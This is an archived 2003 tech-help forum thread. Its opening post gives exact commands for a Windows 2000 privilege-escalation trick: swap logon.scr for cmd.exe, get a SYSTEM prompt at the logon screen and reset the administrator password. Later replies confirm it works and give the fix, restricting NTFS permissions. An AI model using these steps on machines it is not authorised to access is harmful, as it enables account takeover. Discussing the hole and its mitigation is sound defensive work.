Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium

x
?
Solved

i have a new exploit for you all to figure a way round

Posted on 2003-02-20
11
Medium Priority
?
133 Views
Last Modified: 2013-12-04
This is straight for a brain child. It makes so much sense that no one ever thought to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will
show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.


If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator <newpassword>
and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.


 
Credits:

Author:Will W.

 
0
Comment
Question by:wirehead203
  • 6
  • 2
9 Comments
 
LVL 9

Expert Comment

by:MSGeek
ID: 7989242
To clarify, you are looking for a way around this exploit?  It does not even sond like you are sure it works?
0
 
LVL 1

Expert Comment

by:craigtin
ID: 7995330
I think you answer your own question.  If you allow full permisson to the system folders for users why do you care if they can rename a file?
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 8009998
By the way, this exploit does work.  
0
Who's Defending Your Organization from Threats?

Protecting against advanced threats requires an IT dream team – a well-oiled machine of people and solutions working together to defend your organization. Download our resource kit today to learn more about the tools you need to build you IT Dream Team!

 
LVL 9

Expert Comment

by:MSGeek
ID: 8009999
By the way, this exploit does work.  
0
 
LVL 1

Accepted Solution

by:
craigtin earned 100 total points
ID: 8010072
even if you restrict users rights on the folders?
Then the command prompt must be using system privilage.
0
 
LVL 9

Assisted Solution

by:MSGeek
MSGeek earned 100 total points
ID: 8010251
If you change NTFS rights so they cannot del and copy (rename) the file your ok.  This will not work with default security settings for normal users in XP.  But it does in 2000 and 2000 Server
0
 

Expert Comment

by:CleanupPing
ID: 9070888
wirehead203:
This old question needs to be finalized -- accept an answer, split points, or get a refund.  For information on your options, please click here-> http:/help/closing.jsp#1 
EXPERTS:
Post your closing recommendations!  No comment means you don't care.
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 9073148
wirehead.. how'd you make out with this.  MSGeek.
0
 
LVL 9

Expert Comment

by:MSGeek
ID: 11349154
Thanks Modulo.  MSGeek
0

Featured Post

Cyber Threats to Small Businesses (Part 2)

The evolving cybersecurity landscape presents SMBs with a host of new threats to their clients, their data, and their bottom line. In part 2 of this blog series, learn three quick processes Webroot’s CISO, Gary Hayslip, recommends to help small businesses beat modern threats.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This is a guide to the following problem (not exclusive but here) on Windows: Users need our support and we supporters often use global administrative accounts to do this. Using these accounts safely is a real challenge. Any admin who takes se…
No security measures warrant 100% as a "silver bullet". The truth is we also cannot assume anything but a defensive and vigilance posture. Adopt no trust by default and reveal in assumption. Only assume anonymity or invisibility in the reverse. Safe…
This video shows how to quickly and easily deploy an email signature for all users in Office 365 and prevent it from being added to replies and forwards. (the resulting signature is applied on the server level in Exchange Online) The email signat…
Look below the covers at a subform control , and the form that is inside it. Explore properties and see how easy it is to aggregate, get statistics, and synchronize results for your data. A Microsoft Access subform is used to show relevant calcul…
Suggested Courses

577 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question